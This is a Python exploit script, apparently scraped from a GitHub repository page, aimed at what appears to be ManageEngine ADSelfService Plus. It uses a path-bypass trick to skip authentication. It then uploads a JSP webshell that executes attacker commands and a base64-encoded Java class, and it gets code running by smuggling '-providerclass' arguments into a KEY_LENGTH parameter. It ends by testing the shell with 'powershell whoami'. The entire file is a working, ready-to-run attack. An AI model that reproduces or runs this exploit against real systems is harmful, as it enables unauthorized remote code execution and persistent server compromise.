-
Notifications
You must be signed in to change notification settings - Fork 20
/
Copy pathexploit.py
150 lines (125 loc) · 5.62 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
#!/usr/bin/env python3
import requests
import argparse
from base64 import b64decode
from io import BytesIO
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-t','--target', required=True, type=str, default=None, help='Remote Target IP Address (ex: http://192.168.10.5/)')
parser.add_argument('-w','--webshell', required=False, help='Path to jsp file to execute')
parser.add_argument('-j','--java_class', required=False, help='Path to java class to execute')
parser.add_argument('-s','--skip', required=False, default=False, action='store_true', help='Do not verify if target is vulnerable')
args = parser.parse_args()
exploit(args)
def check(args):
if not "http" in args.target:
print("Please specify schema (http/https)")
exit(1)
check_bypass_endpoint = "/./RestAPI/LogonCustomization"
chek_url = args.target + check_bypass_endpoint
s = requests.Session()
data = {"methodToCall":"previewMobLogo"}
req = requests.Request(url=chek_url, method='POST', data=data)
prep = req.prepare()
prep.url = chek_url
try:
response = s.send(prep, verify=False)
except Exception as e:
print(e)
exit(1)
if '<script type="text/javascript">var d = new Date();' in response.text:
print("[+] Target is vulnerable!")
return
else:
print("[-] Target doesn't seem vulnerable")
exit(1)
def exploit(args):
if not args.skip:
check(args)
upload_jsp(args)
upload_java_class(args)
execute_rce(args)
# optionnal
verify_webshell(args)
def upload_jsp(args):
upload_url = args.target + "/./RestAPI/LogonCustomization"
if args.webshell:
files = {'CERTIFICATE_PATH': ('ws.jsp', open(args.webshell, 'r'))}
else:
webshell = """<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
"""
files = {'CERTIFICATE_PATH': ('ws.jsp', webshell)}
data = {"methodToCall":"unspecified", "Save":"yes","form":"smartcard","operation":"Add"}
s = requests.Session()
req = requests.Request(url=upload_url, method='POST', files=files, data=data)
prep = req.prepare()
prep.url = upload_url
response = s.send(prep, verify=False)
if response.status_code == 404:
print("[+] Webshell successfully uploaded")
else:
print("[-] Can't upload webshell")
exit(1)
def upload_java_class(args):
upload_url = args.target + "/./RestAPI/LogonCustomization"
if args.java_class:
files = {'CERTIFICATE_PATH': ('Si.class', open(args.java_class, 'rb'))}
else:
java1_8_payload_b64 = "yv66vgAAADQAKAoADAAWCgAXABgHABkIABoIABsIABwIAB0IAB4KABcAHwcAIAcAIQcAIgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAAg8Y2xpbml0PgEADVN0YWNrTWFwVGFibGUHACABAApTb3VyY2VGaWxlAQAHU2kuamF2YQwADQAOBwAjDAAkACUBABBqYXZhL2xhbmcvU3RyaW5nAQADY21kAQACL2MBAARjb3B5AQAGd3MuanNwAQAqLi5cd2ViYXBwc1xhZHNzcFxoZWxwXGFkbWluLWd1aWRlXHRlc3QuanNwDAAmACcBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQACU2kBABBqYXZhL2xhbmcvT2JqZWN0AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQALAAwAAAAAAAIAAQANAA4AAQAPAAAAHQABAAEAAAAFKrcAAbEAAAABABAAAAAGAAEAAAACAAgAEQAOAAEADwAAAGQABQACAAAAK7gAAksqCL0AA1kDEgRTWQQSBVNZBRIGU1kGEgdTWQcSCFO2AAlMpwAES7EAAQAAACYAKQAKAAIAEAAAABIABAAAAAUABAAGACYABwAqAAgAEgAAAAcAAmkHABMAAAEAFAAAAAIAFQ=="
files = {'CERTIFICATE_PATH': ('Si.class', BytesIO(b64decode(java1_8_payload_b64)))}
data = {"methodToCall":"unspecified", "Save":"yes","form":"smartcard","operation":"Add"}
s = requests.Session()
req = requests.Request(url=upload_url, method='POST', files=files, data=data)
prep = req.prepare()
prep.url = upload_url
response = s.send(prep, verify=False)
if response.status_code == 404:
print("[+] Java Class successfully uploaded")
else:
print("[-] Can't upload Java Class")
exit(1)
def execute_rce(args):
rce_url = args.target + "/./RestAPI/Connection"
s = requests.Session()
data = {"methodToCall":"openSSLTool","action":"generateCSR","KEY_LENGTH":'1024 -providerclass Si -providerpath "..\\bin"'}
req = requests.Request(url=rce_url, method='POST', data=data)
prep = req.prepare()
prep.url = rce_url
response = s.send(prep, verify=False)
if response.status_code == 404:
print("[+] Got expected response code to trigger RCE")
else:
print("[-] Can't trigger RCE from Java Class")
print("Server replied with status code {}".format(response.status_code))
exit(1)
def verify_webshell(args):
webshell_url = args.target + "/help/admin-guide/test.jsp"
response = requests.post(webshell_url, data={"cmd":'powershell "whoami"'}, verify=False)
try:
if(response.status_code == 404):
print("Can't find webshell")
else:
print(response.text)
print("[+] Webshell successfully upload.")
print("[+] Find it on {}".format(webshell_url))
except:
print("Can't parse response")
print(response.status_code)
print(response.text)
if __name__ == '__main__':
main()